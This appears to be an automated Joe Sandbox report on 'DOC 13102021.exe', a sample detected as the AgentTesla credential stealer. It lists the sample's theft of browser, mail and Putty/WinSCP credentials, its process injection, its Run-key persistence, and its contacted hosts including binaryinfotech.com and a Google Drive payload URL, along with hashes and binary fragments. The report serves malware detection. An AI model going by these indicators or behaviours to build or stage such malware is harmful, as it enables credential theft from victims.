            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2588, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2588, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1File and Directory Permissions Modification1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1Credentials in Registry1System Information Discovery115Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery421SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion341SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion341DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1647 Sample: DOC 13102021.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 26 mail.binaryinfotech.com 2->26 28 binaryinfotech.com 2->28 30 4 other IPs or domains 2->30 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Potential malicious icon found 2->40 42 Found malware configuration 2->42 44 6 other signatures 2->44 8 DOC 13102021.exe 2->8         started        11 tKZVPq.exe 2 2->11         started        signatures3 process4 signatures5 46 Writes to foreign memory regions 8->46 48 Tries to detect Any.run 8->48 50 Hides threads from debuggers 8->50 13 RegAsm.exe 2 11 8->13         started        18 conhost.exe 11->18         started        process6 dnsIp7 32 binaryinfotech.com 132.148.164.170, 49766, 587 AS-26496-GO-DADDY-COM-LLCUS United States 13->32 34 googlehosted.l.googleusercontent.com 142.250.184.193, 443, 49762 GOOGLEUS United States 13->34 36 drive.google.com 216.58.212.174, 443, 49761 GOOGLEUS United States 13->36 22 C:\Users\user\AppData\Roaming\...\tKZVPq.exe, PE32 13->22 dropped 24 C:\Windows\System32\drivers\etc\hosts, ASCII 13->24 dropped 52 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->52 54 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 13->54 56 Tries to steal Mail credentials (via file access) 13->56 58 7 other signatures 13->58 20 conhost.exe 13->20         started        file8 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DOC 13102021.exe30%VirustotalBrowse
            DOC 13102021.exe25%ReversingLabsWin32.Trojan.Mucc

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            binaryinfotech.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://binaryinfotech.com0%VirustotalBrowse
            http://binaryinfotech.com0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://nQcaIX.com0%Avira URL Cloudsafe
            https://iMTj3lrhN3y57FrL8VE.com0%Avira URL Cloudsafe
            https://iMTj3lrhN3y57FrL8VE.comt-0%Avira URL Cloudsafe
            http://mail.binaryinfotech.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		216.58.212.174
            		truefalse
              		high
              googlehosted.l.googleusercontent.com
              		142.250.184.193
              		truefalse
                		high
                binaryinfotech.com
                		132.148.164.170
                		truetrueunknown
                doc-0c-28-docs.googleusercontent.com
                		unknown
                		unknownfalse
                  		high
                  mail.binaryinfotech.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://doc-0c-28-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vr17dakf7s0cou2qripnjj0rpkilfov4/1634137800000/16524389560697724177/*/1C8oenb3NC7djnCvQzvUetP49sAKvj9vX?e=downloadfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://binaryinfotech.comRegAsm.exe, 00000019.00000002.5660376539.000000001DC4E000.00000004.00000001.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNSRegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://doc-0c-28-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vr17dakfRegAsm.exe, 00000019.00000003.1413747869.0000000000FB4000.00000004.00000001.sdmpfalse
                        		high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://drive.google.com/RegAsm.exe, 00000019.00000002.5640301133.0000000000F28000.00000004.00000020.sdmpfalse
                          		high
                          http://nQcaIX.comRegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://iMTj3lrhN3y57FrL8VE.comRegAsm.exe, 00000019.00000002.5659697013.000000001DBED000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5660466574.000000001DC5C000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000003.2361567201.000000001C8C1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://iMTj3lrhN3y57FrL8VE.comt-RegAsm.exe, 00000019.00000002.5659697013.000000001DBED000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://mail.binaryinfotech.comRegAsm.exe, 00000019.00000002.5660376539.000000001DC4E000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000019.00000002.5658813337.000000001DB81000.00000004.00000001.sdmpfalse
                            		high
                            https://doc-0c-28-docs.googleusercontent.com/RegAsm.exe, 00000019.00000003.1413747869.0000000000FB4000.00000004.00000001.sdmpfalse
                              		high

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              142.250.184.193
                              		googlehosted.l.googleusercontent.comUnited States
                              		15169GOOGLEUSfalse
                              216.58.212.174
                              		drive.google.comUnited States
                              		15169GOOGLEUSfalse
                              132.148.164.170
                              		binaryinfotech.comUnited States
                              		26496AS-26496-GO-DADDY-COM-LLCUStrue

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:1647
                              Start date:13.10.2021
                              Start time:17:05:58
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 14m 43s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:DOC 13102021.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:43
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.rans.spre.troj.adwa.spyw.evad.winEXE@6/5@3/3
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 96%
                              • Number of executed functions: 132
                              • Number of non-executed functions: 4
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, BdeUISrv.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, IntelPTTEKRecertification.exe, BackgroundTransferHost.exe, HxTsr.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 51.105.236.244, 20.82.19.171, 40.117.96.136, 204.79.197.200, 13.107.21.200, 13.107.5.88, 20.50.102.62, 40.112.88.60, 20.199.120.182, 52.109.12.20, 20.82.209.183, 52.242.97.97, 52.152.108.96, 52.152.110.14, 92.123.195.35, 92.123.195.73, 209.197.3.8, 2.21.140.114, 20.82.210.154, 51.124.78.146, 20.190.160.69, 20.190.160.75, 20.190.160.6, 20.190.160.134, 20.190.160.136, 20.190.160.71, 20.190.160.67, 20.190.160.132, 20.199.120.85
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, sls.update.microsoft.com.akadns.net, ris-prod.trafficmanager.net, www.tm.a.prd.aadg.akadns.net, wd-prod-cp.trafficmanager.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, nexusrules.officeapps.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net, e-0009.e-msedge.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, wns.notify.trafficmanager.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, slscr.update.microsoft.com.akadns.net, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, manage.devcenter.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              17:09:29Task SchedulerRun new task: Intel PTT EK Recertification path: "C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe"
                              17:11:02API Interceptor2390x Sleep call for process: RegAsm.exe modified
                              17:11:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tKZVPq C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe
                              17:11:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tKZVPq C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              132.148.164.170DOC 10132021.exeGet hashmaliciousBrowse
                                SOA.exeGet hashmaliciousBrowse
                                  SecuriteInfo.com.Variant.Razy.961905.21681.exeGet hashmaliciousBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    AS-26496-GO-DADDY-COM-LLCUSPurchase_Order 2586.xlsGet hashmaliciousBrowse
                                    • 148.72.0.122
                                    REMITTANCE-54324.exeGet hashmaliciousBrowse
                                    • 107.180.56.180
                                    D0sF4Fm8ZaGet hashmaliciousBrowse
                                    • 160.153.44.209
                                    rLGunciziYGet hashmaliciousBrowse
                                    • 160.153.44.229
                                    Swift copy.exeGet hashmaliciousBrowse
                                    • 182.50.132.92
                                    DOC 10132021.exeGet hashmaliciousBrowse
                                    • 132.148.164.170
                                    Purchase order.exeGet hashmaliciousBrowse
                                    • 182.50.132.92
                                    microsoft_services_agreement_section_6b.jsGet hashmaliciousBrowse
                                    • 198.71.233.36
                                    REQ2021102862448032073.exeGet hashmaliciousBrowse
                                    • 184.168.131.241
                                    ABONOF2201.exeGet hashmaliciousBrowse
                                    • 107.180.56.180
                                    NEW P.O3421280.exeGet hashmaliciousBrowse
                                    • 107.180.56.180
                                    signed copy.exeGet hashmaliciousBrowse
                                    • 107.180.56.180
                                    PO09858.exeGet hashmaliciousBrowse
                                    • 107.180.56.180
                                    NS. ORDINE N. 141.exeGet hashmaliciousBrowse
                                    • 107.180.56.180
                                    IMPORTS INVOICE.exeGet hashmaliciousBrowse
                                    • 107.180.56.180
                                    sora.x86Get hashmaliciousBrowse
                                    • 198.12.169.177
                                    jjBv8SpZXm.exeGet hashmaliciousBrowse
                                    • 184.168.131.241
                                    Payment Advice.exeGet hashmaliciousBrowse
                                    • 107.180.46.212
                                    pKD3j672HL.exeGet hashmaliciousBrowse
                                    • 50.62.172.157
                                    BANK INFORMATION.exeGet hashmaliciousBrowse
                                    • 182.50.132.92

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    37f463bf4616ecd445d4a1937da06e19Halkbank_Ekstre_20211310_082357_541079.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    ATT10821.htmlGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    Delivery note_241493.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    Delivery note_241493.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    FACTURA.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    REQUIREMENT.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    Statement of Account.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    HUD-Closing-Statement.htmlGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    zrArDsoum0.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    correction HAWB.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    UZWdHg3hWA.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    LBJiq1QBaH.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    Statement of Account.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    Potvrda narudzbe u prilogu.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    art-1881052385.xlsGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    184285013-044310-sanlccjavap0003-7069_pdf (5).exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    DOC 10132021.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174
                                    WIRE ADVICE.exeGet hashmaliciousBrowse
                                    • 142.250.184.193
                                    • 216.58.212.174

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeStatement of Account.exeGet hashmaliciousBrowse
                                      correction HAWB.exeGet hashmaliciousBrowse
                                        DOC 10132021.exeGet hashmaliciousBrowse
                                          WIRE ADVICE.exeGet hashmaliciousBrowse
                                            Foreign_Bank Account Details.exeGet hashmaliciousBrowse
                                              SOA.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.Variant.Razy.961905.21681.exeGet hashmaliciousBrowse
                                                  Swift USD 9300.exeGet hashmaliciousBrowse
                                                    SOA.exeGet hashmaliciousBrowse
                                                      justificante.exeGet hashmaliciousBrowse
                                                        Facilitative8.exeGet hashmaliciousBrowse

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tKZVPq.exe.log
                                                          Process:C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):42
                                                          Entropy (8bit):4.0050635535766075
                                                          Encrypted:false
                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                          C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):65440
                                                          Entropy (8bit):6.049806962480652
                                                          Encrypted:false
                                                          SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                          MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                          SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                          SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                          SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: Statement of Account.exe, Detection: malicious, Browse
                                                          • Filename: correction HAWB.exe, Detection: malicious, Browse
                                                          • Filename: DOC 10132021.exe, Detection: malicious, Browse
                                                          • Filename: WIRE ADVICE.exe, Detection: malicious, Browse
                                                          • Filename: Foreign_Bank Account Details.exe, Detection: malicious, Browse
                                                          • Filename: SOA.exe, Detection: malicious, Browse
                                                          • Filename: SecuriteInfo.com.Variant.Razy.961905.21681.exe, Detection: malicious, Browse
                                                          • Filename: Swift USD 9300.exe, Detection: malicious, Browse
                                                          • Filename: SOA.exe, Detection: malicious, Browse
                                                          • Filename: justificante.exe, Detection: malicious, Browse
                                                          • Filename: Facilitative8.exe, Detection: malicious, Browse
                                                          Reputation:moderate, very likely benign file
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                          C:\Windows\System32\drivers\etc\hosts
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):835
                                                          Entropy (8bit):4.694294591169137
                                                          Encrypted:false
                                                          SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                          MD5:6EB47C1CF858E25486E42440074917F2
                                                          SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                          SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                          SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview: # Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
                                                          \Device\ConDrv
                                                          Process:C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1049
                                                          Entropy (8bit):4.286073681226177
                                                          Encrypted:false
                                                          SSDEEP:24:z3d3+DO/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zNODBXZxo4ABV+SrUYE
                                                          MD5:402278578416001C915480C7040F2964
                                                          SHA1:B4833865ECE3609EC213509D4AB7D7A195C00753
                                                          SHA-256:86E0747C9B54AA9AACB788589E70E19279DF13F1393795E689342AF3302912E1
                                                          SHA-512:473600FBC051B22E9E7A6FBE1694ED736CF90DE5A8DF92AF1FA9A85DDD97379CFF0E8A5DF89937AE083BEBEFC81C407A907D0FB5ED9019BEDF6FB4703838321B
                                                          Malicious:false
                                                          Preview: Microsoft .NET Framework Assembly Registration Utility version 4.8.4084.0..for Microsoft .NET Framework version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information..

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.259839707213013
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.15%
                                                          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:DOC 13102021.exe
                                                          File size:139264
                                                          MD5:31851bac3685c5641fc16e256c94c4a8
                                                          SHA1:31fea2ceaeb535863d46ec5260385649c34c0fa0
                                                          SHA256:e1940206b5e3300e88b817953a62d90a2e69b738df549dc5da993409a6487ae1
                                                          SHA512:2771385f578363d234df333e3f7291cb549f01ba8d99fb4a2019119c92914f73f29295c752c1682f00822cc85f92621134eac1abd3ffa7dd56d2e55c3f10ed14
                                                          SSDEEP:3072:8BtA0di9VPKLRp6d1KBRk2e82wzbC8DmE:0tU9kLRpw1KTket+8
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......W.....................`......h.............@.............B..

                                                          File Icon

                                                          Icon Hash:20047c7c70f0e004

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x401868
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                          DLL Characteristics:
                                                          Time Stamp:0x57CFAE81 [Wed Sep 7 06:06:57 2016 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:c727a98e677fb7bd25bb06d2a2d956f1

                                                          Entrypoint Preview

                                                          Instruction
                                                          push 004105A8h
                                                          call 00007F8FE46592D5h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          xor byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          cmp byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          adc byte ptr [eax+5Dh], bh
                                                          fistp word ptr [eax-61h]
